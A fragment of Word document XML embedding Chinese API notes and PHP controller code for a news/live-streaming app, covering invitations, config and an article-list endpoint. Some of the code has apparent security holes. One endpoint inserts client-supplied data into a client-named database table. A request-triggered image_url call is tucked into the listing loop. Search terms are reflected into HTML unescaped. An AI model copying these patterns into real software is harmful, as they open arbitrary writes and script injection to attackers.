          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取邀请链接地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04946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邀请链接地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C716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369C4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3D899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4795A5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qr_code      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请二维码图片地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F978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4793C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B7A8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D85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vitation_links()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABDF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BAA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9E4B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r_code' =&gt; '/public/style/index/member/img/userimg.gif',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AE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1C9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D83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DF2C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6D50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254A8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Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36776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D3F76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public function index($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2A6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data = json_decode(htmlspecialchars_decode($data),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE5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data['__name__'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724305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nset($data['__name__']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B9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nset($data['pwd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD1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cho db($name)-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C607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C171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gt;&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4D4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3BEE1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37AC8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Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C1D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Request; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A67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05C0C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Article extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A143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5A9F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74F05F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4483F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B75D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13777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E991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6389B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2F7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79097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F601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4AA30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9771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4EE497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328D97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7CE9A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mber_id = _decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DB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5E9B0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7C0C2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7A7625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217FB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3AADF3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3E57BF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4763E2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5DF5E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D3407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10062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577D1B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836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73B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E3BE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2A517B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1306C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7393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826D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45C94C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56825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0AD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4E7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92016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7F0ABC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59F442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AA0C3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47596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3E29A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5F426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F45D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C1F3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0AF0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1303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56E7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A4EB7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78F1A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69FF8C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C2D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EA2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4D50C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D09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354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D05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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73943A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887E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53F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nfig() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF4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yaoqing']    =   $config['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5469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config']     =   $config['appConfig']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77510D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nwu']      =   $config['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79CF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hibo']      =   $config['zhibo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B135B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iwu']       =   Db::name('member_zhibo_liwu')-&gt;order('des desc, id asc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A72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7B4C7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492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1B0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lists </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A31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资讯列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BA9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15E0D5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D5932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FAE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62D4C9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typeid       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定分类文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个分类填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>typeid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>快讯）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18357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flags        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个属性填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654A5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mychannel    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个频道填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08638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s        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5724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66305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List} field          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F1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EFB0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条数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E4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36CBD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538E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总记录数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C32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description    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯概述</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0F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zan            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯获赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C40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Num        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7777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share_num      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E334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DF8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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98DC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0F5626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request-&gt;param('token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE6E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19E22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138D0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23544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737E9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29BF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AD74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input('param.typeid/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50A2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lags = $request-&gt;param('flags/d') ? $request-&gt;param('flags/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D28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request-&gt;param('mychannel/d') ? $request-&gt;param('mychannel/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAAF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request-&gt;param('pages/d') ? $request-&gt;param('pages/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410B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request-&gt;param('uid/d') ? $request-&gt;param('uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104A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arch = $request-&gt;param('search') ? $request-&gt;param('search') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5CD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itoutiao = $request-&gt;param('weitoutiao/d') ? $request-&gt;param('weitoutiao/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B92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request-&gt;param('date/d') ? $request-&gt;param('date/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AF51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request-&gt;param('city') ? urldecode($request-&gt;param('city')) : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3E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 = $request-&gt;param('ids/d') ? $request-&gt;param('ids/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F96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 = $request-&gt;param('hide/d') ? $request-&gt;param('hide/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D751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data = $request-&gt;param('svideodata/d') ? $request-&gt;param('svideodata/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303BD5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hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E62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s){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3A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lt;',$ids];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8A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C0DA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ty == 'index.php') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04996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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4388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D66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ty) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2567F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B7B7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tags|content|description|keywords'] = ['like', '%' . $city . '%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F483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665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id &amp;&amp; $typeid != 999999999) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271296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id != 132) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F270A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s = _typeTid($typeid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC32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s = implode(',', $typeids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB36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 = ['in', $typeids];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D0A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CF4F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1BC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lags){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F0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lags'] = $flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFC6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7C5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D25C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in', $mychannel];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C973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B4A7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lt;&gt;', 4];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D0B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2B9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id == 132) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE85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3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB43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BD8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465399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1033D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weitoutiao) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30675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 '1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FFC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CDCE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 '0,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D14F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F3D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 '0,1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D1C5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ide){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8868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hide;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E8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2E5B3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where['hide']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0120D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318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925FD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id != 999999999) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01780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weitoutiao) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75826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 '1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B83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53B2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in', '0,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C43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52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D4E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EB1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search) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB8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tags'] = ['like', '%' . $search . '%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21454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FDB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e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C3F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91D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amp;&amp; $typeid == 999999999) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E065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uanzhuList = _userGuanzhuList($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA72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GuanzhuList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C41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25D3C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gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDA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027C89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t_page' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB12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6D242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146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8C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GuanzhuList = implode(',', $UidGuanzhuList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2DD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in', $UidGuanzhuList];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A84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09F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F87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here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A7E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etchSql(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EBD1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 update_time desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C17B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id,title,dtitle,description,mychannel,image,update_time,source,pingNum,images,videodate,uid,click,weitoutiao,zan,pingNum,share_num,video,qiniu_video_type,content,hide,flags')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A632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ages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F19C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70110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 ['appConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DF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6DF366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flags'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCC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flags_name'] = _flags($v['flags']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E93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3EE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3 &amp;&amp; $v['video'] || $v['mychannel'] == 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903BC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video'] = _imgUrl() . $v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F5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7F1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amp;&amp; $v['mychannel'] != 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFD3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4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D6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v['image'].'?imageView2/1/w/300/h/450/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2E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B5354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v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D88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DA8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8833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3BF28C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v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63130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F1DE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1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F654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6176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 . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E43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1B40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07C7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ACB8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reate_time'] = _time($v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A248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earch) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77318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tle'] = str_replace($search, '&lt;b class="fx-search"&gt;' . $search . '&lt;/b&gt;', $v['title']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433136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F262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uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB6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496C5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28A7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username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E9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img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8BE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D4D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id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07600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7C5C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mg')){$this-&gt;image_url(input('img_data'));}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EAE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weitoutiao'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097F8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uandu = "?imageView2/1/w/192/h/124/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D35F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2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3CCE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cList'] = json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53782F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k]['pcList'] as $k_imagesPro =&gt; $v_imagesPro) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF9E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_imgUrl() . $v_imagesPro['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C129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4AA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Pro'] = $imagesPro;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90D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09027E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lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $v['image'] . '?imageView2/1/w/400/h/280/format/jpg" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6F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A437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json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EF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images['0']['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D17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lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $images . '?imageView2/1/w/400/h/280/format/jpg" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382A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322E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images . '&lt;em class="aui-iconfont aui-icon-image"&gt; ' . count(json_decode($v['images'], true)) . ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/em&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CF2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v['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D5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v['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4705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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B06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 src=\"(.*?)\"/", $v['content'], $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E64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a =&gt; $va) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63464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pos($va, 'http') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B250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va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E0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trpos($va, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F646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config['url'] . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63C4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81A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_imgUrl() . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3923F0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CCDD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85D09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ArticleList'] = $contet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244DB6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5362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E08B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description'] = _substr($v['description'], 100, '&lt;a&gt;...[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看全文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]&lt;/a&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CE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3 || $v['video'] || $v['mychannel'] == 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391AB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qiniu_video_type']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC5C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video'] . '?vframe/jpg/offset/2/w/200/h/200/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59808D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3C8B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36259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image'] . '?imageView2/1/w/300/h/200/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45D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A5AA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video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8754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C8B5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F77A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image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F250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1763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uandu = "?imageView2/1/w/200/h/200/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B406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json_decode(htmlspecialchars_decode($v['images']) , true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702EA9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data'][$k]['images']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492327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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B9C7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46291F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k]['images'] as $ks =&gt; $vsa) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA8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data'][$k]['images']) == 1 || count($data['data'][$k]['images']) == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5D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6";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CA2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F6ABA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4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C928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D5D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array($vsa)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C70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sa = $vsa['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF86D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8C5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_imgUrl() . $vsa . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C0A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lt;div class="' . $col . '" tapmode onclick="img(' . $v['id'] . ',' . $ks . ')"&gt;&lt;img id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $vsa . $kuandu . '" src="../image/loadingImage.png"&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15268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D79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images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E60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Pro'] = $imagesPro;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4B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6632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BA2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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D87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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E59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uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A104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7CE525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 = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE0E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uid', $uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F3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v['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43714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D104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Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BC2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id', $v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B02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uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDA0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34260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26807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E6F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CD7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6C3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rl'] = url('article/view', ['id' =&gt; $v['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565962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249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 = count($data['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4FB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d &gt; 1 &amp;&amp; !$weitoutiao) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749A8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Db = Db::name('ad')-&gt;where(['hide' =&gt; 1,'device'=&gt;0])-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885B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dDb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83C8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mychannel'] = 99;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ACD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url'] = $sdDb['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFFD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title'] = $sdDb['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918F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ad'] = $sdDb['ad'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6E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image'] = _imgUrl() . $sdDb['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF3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ad]['source'] = $sdDb['source'];</w:t>
      </w:r>
    </w:p>
